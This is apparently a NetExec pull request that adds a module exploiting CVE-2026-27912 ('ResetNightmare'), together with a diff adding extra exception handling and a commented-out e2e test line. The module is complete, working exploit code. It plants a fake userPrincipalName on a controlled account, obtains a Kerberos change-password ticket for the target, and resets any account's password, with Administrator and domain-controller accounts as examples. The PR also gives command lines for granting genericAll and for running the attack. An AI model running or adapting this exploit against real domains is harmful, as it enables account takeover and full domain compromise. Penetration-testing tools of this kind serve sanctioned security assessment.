### PR TITLE
Add ResetNightmare module

### DIFF
--- a/nxc/modules/resetnightmare.py
+++ b/nxc/modules/resetnightmare.py
@@ -86,7 +86,7 @@ class NXCModule:
         kdc = self.connection.kdcHost or self.connection.host
         try:
             tgt, cipher, _, session_key = getKerberosTGT(client, self.upn_password, self.connection.domain, "", "", "", kdcHost=kdc, serverName=KRB5_KPASSWD_TGT_SPN)
-        except KerberosError as e:
+        except (KerberosError, OSError) as e:
             self.context.log.fail(f"Failed to request change-password TGT: {e}")
             return None
         self.context.log.success(f"Obtained NT-ENTERPRISE TGT for '{self.target}' targeting {KRB5_KPASSWD_TGT_SPN}")
@@ -96,7 +96,7 @@ class NXCModule:
         kdc = self.connection.kdcHost or self.connection.host
         try:
             changePassword(self.target, self.connection.domain, self.new_password, TGT=tgt, kdcHost=kdc, kpasswdHost=kdc)
-        except KPasswdError as e:
+        except (KPasswdError, KerberosError, OSError) as e:
             self.context.log.fail(f"Password change failed: {' '.join(str(e).split())}")
             return False
         return True

--- a/nxc/modules/resetnightmare.py
+++ b/nxc/modules/resetnightmare.py
@@ -1,0 +1,136 @@
+import sys
+from impacket.krb5 import constants
+from impacket.krb5.types import Principal
+from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
+from impacket.krb5.kpasswd import changePassword, KPasswdError, KRB5_KPASSWD_TGT_SPN
+from impacket.ldap.ldap import MODIFY_REPLACE, MODIFY_DELETE, LDAPSessionError
+from nxc.helpers.misc import CATEGORY
+from nxc.parsers.ldap_results import parse_result_attributes
+
+
+class NXCModule:
+    """
+    Module by @azoxlpf based on the ResetNightmare PoC and
+    https://www.semperis.com/blog/identity-crisis-novel-vulnerabilities-leading-to-kerberos-downgrade-dos-and-full-domain-takeover/
+    """
+
+    name = "resetnightmare"
+    description = "Exploit ResetNightmare (CVE-2026-27912) to reset any account's password via Kerberos change password"
+    supported_protocols = ["ldap"]
+    category = CATEGORY.PRIVILEGE_ESCALATION
+
+    def __init__(self):
+        self.context = None
+        self.connection = None
+        self.target = None
+        self.new_password = None
+        self.upn_user = None
+        self.upn_password = None
+
+    def options(self, context, module_options):
+        """
+        Reset any account's password by abusing the Kerberos Change Password protocol (CVE-2026-27912, ResetNightmare).
+        Requires GenericWrite over a controlled account's userPrincipalName, and an unpatched DC.
+
+        TARGET          sAMAccountName of the account whose password gets reset (append $ for a computer)
+        NEW_PASSWORD    New password to set on TARGET
+        UPN_USER        sAMAccountName of a controlled account you can write a userPrincipalName to (not the login account)
+        UPN_PASSWORD    Cleartext password of UPN_USER
+
+        Examples:
+        netexec ldap <ip> -u <username> -p <password> -M resetnightmare -o TARGET=Administrator NEW_PASSWORD='NewPass!' UPN_USER=controlled UPN_PASSWORD='Passw0rd!'
+        netexec ldap <ip> -u <username> -p <password> -M resetnightmare -o TARGET=DC01$ NEW_PASSWORD='NewPass!' UPN_USER=controlled$ UPN_PASSWORD='Passw0rd!'
+        """
+        self.target = module_options.get("TARGET")
+        self.new_password = module_options.get("NEW_PASSWORD")
+        self.upn_user = module_options.get("UPN_USER")
+        self.upn_password = module_options.get("UPN_PASSWORD")
+
+        if not all([self.target, self.new_password, self.upn_user, self.upn_password]):
+            context.log.fail("TARGET, NEW_PASSWORD, UPN_USER and UPN_PASSWORD are all required")
+            sys.exit(1)
+
+    def resolve_account(self, sam):
+        response = self.connection.search(searchFilter=f"(sAMAccountName={sam})", attributes=["distinguishedName"])
+        entries = parse_result_attributes(response)
+        return entries[0]["distinguishedName"] if entries else None
+
+    def get_account_upn(self, sam):
+        response = self.connection.search(searchFilter=f"(sAMAccountName={sam})", attributes=["distinguishedName", "userPrincipalName"])
+        entries = parse_result_attributes(response)
+        if not entries:
+            return None, None
+        return entries[0]["distinguishedName"], entries[0].get("userPrincipalName")
+
+    def set_upn(self, dn, upn):
+        try:
+            self.connection.ldap_connection.modify(dn, {"userPrincipalName": [(MODIFY_REPLACE, upn)]})
+            return True
+        except LDAPSessionError as e:
+            self.context.log.fail(f"Failed to set UPN on {self.upn_user}: {e}")
+            return False
+
+    def restore_upn(self, dn, old_upn):
+        try:
+            if old_upn:
+                self.connection.ldap_connection.modify(dn, {"userPrincipalName": [(MODIFY_REPLACE, old_upn)]})
+                self.context.log.display(f"Restored original UPN '{old_upn}' on {self.upn_user}")
+            else:
+                self.connection.ldap_connection.modify(dn, {"userPrincipalName": [(MODIFY_DELETE, [])]})
+                self.context.log.display(f"Cleared fake UPN from {self.upn_user}")
+        except LDAPSessionError as e:
+            self.context.log.fail(f"Cleanup failed, UPN may still be set on {self.upn_user}: {e}")
+
+    def request_changepw_tgt(self):
+        client = Principal(self.target, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+        kdc = self.connection.kdcHost or self.connection.host
+        try:
+            tgt, cipher, _, session_key = getKerberosTGT(client, self.upn_password, self.connection.domain, "", "", "", kdcHost=kdc, serverName=KRB5_KPASSWD_TGT_SPN)
+        except KerberosError as e:
+            self.context.log.fail(f"Failed to request change-password TGT: {e}")
+            return None
+        self.context.log.success(f"Obtained NT-ENTERPRISE TGT for '{self.target}' targeting {KRB5_KPASSWD_TGT_SPN}")
+        return {"KDC_REP": tgt, "cipher": cipher, "sessionKey": session_key}
+
+    def reset_password(self, tgt):
+        kdc = self.connection.kdcHost or self.connection.host
+        try:
+            changePassword(self.target, self.connection.domain, self.new_password, TGT=tgt, kdcHost=kdc, kpasswdHost=kdc)
+        except KPasswdError as e:
+            self.context.log.fail(f"Password change failed: {' '.join(str(e).split())}")
+            return False
+        return True
+
+    def on_login(self, context, connection):
+        self.context = context
+        self.connection = connection
+
+        target_dn = self.resolve_account(self.target)
+        if not target_dn:
+            context.log.fail(f"Target '{self.target}' not found")
+            return
+        upn_dn, old_upn = self.get_account_upn(self.upn_user)
+        if not upn_dn:
+            context.log.fail(f"Controlled account '{self.upn_user}' not found")
+            return
+
+        context.log.display(f"Target: {self.target} ({target_dn})")
+        context.log.display(f"Controlled account: {self.upn_user} ({upn_dn}), current UPN: {old_upn or '<none>'}")
+
+        if not self.set_upn(upn_dn, self.target):
+            return
+        context.log.success(f"Set fake UPN '{self.target}' on {self.upn_user}")
+
+        try:
+            tgt = self.request_changepw_tgt()
+        finally:
+            self.restore_upn(upn_dn, old_upn)
+
+        if tgt is None:
+            return
+
+        if not self.reset_password(tgt):
+            return
+
+        context.log.highlight(f"Successfully reset password of '{self.target}' to '{self.new_password}'")
+        context.db.add_credential("plaintext", connection.domain, self.target, self.new_password)

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -246,6 +246,8 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dump-computers
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M raisechild
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M get-scriptpath
+# resetnightmare resets a real account password with no restore and needs a controlled account with GenericWrite on its UPN + an unpatched DC, run manually, not in CI
+#netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M resetnightmare -o TARGET=TARGET_ACCOUNT NEW_PASSWORD=Password123! UPN_USER=CONTROLLED_ACCOUNT UPN_PASSWORD=Password1
 ##### WINRM
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig


### PR DESCRIPTION
## Description

This PR adds a `resetnightmare` module that exploits `CVE-2026-27912` (ResetNightmare) to reset any user or computer account's password through the Kerberos Change Password protocol, based on the PoC by [Shai Laronne ](https://github.com/Semperis-Community/ResetNightmare)

## Type of change
Insert an "x" inside the brackets for relevant items (do not delete options)

- [ ] Bug fix (non-breaking change which fixes an issue)
- [X] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
- [ ] This PR was created with the assistance of AI (list what type of assistance, tool(s)/model(s) in the description)

## Setup guide for the review

Check whether the DC is vulnerable : 

```
nxc smb DC_IP -u 'user' -p 'password' -M enum_cve -o CVE=CVE-2026-27912
```

Get a GenericAll or GenericWrite on a user or a computer : 

```
bloodyAD --host "DC_IP" -d "domain" -u "admin" -p 'password' add genericAll target lowuser
```

And run : 

```
nxc  ldap <ip> -u <username> -p <password> -M resetnightmare -o TARGET=Administrator NEW_PASSWORD="NewPass!" UPN_USER=controlled UPN_PASSWORD="Passw0rd!"
```

## Screenshots (if appropriate):

Add a machine account for the example : 

<img width="1914" height="248" alt="image" src="https://github.com/user-attachments/assets/35bdde54-b9b3-40e0-ad5e-9477e1266c87" />

Grant a genericAll to our user : 

<img width="1837" height="84" alt="image" src="https://github.com/user-attachments/assets/71e191df-5396-41a5-bea2-78926a167787" />

Run the module  : 

<img width="1916" height="538" alt="image" src="https://github.com/user-attachments/assets/5bec31fa-b35a-405e-8820-0b9798441d75" />

Test using a user account that already has a UPN (it gets replaced, then restored to its initial state at the end of the attack), plus target a machine account : 

<img width="1915" height="554" alt="image" src="https://github.com/user-attachments/assets/ad08168f-330c-447a-beeb-bfb21837844f" />

## Checklist:
Insert an "x" inside the brackets for completed and relevant items (do not delete options)

- [X] I have ran Ruff against my changes (poetry: `poetry run ruff check .`, use `--fix` to automatically fix what it can)
- [ ] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [ ] I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
- [X] I have performed a self-review of my own code (_not_ an AI review)
- [X] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
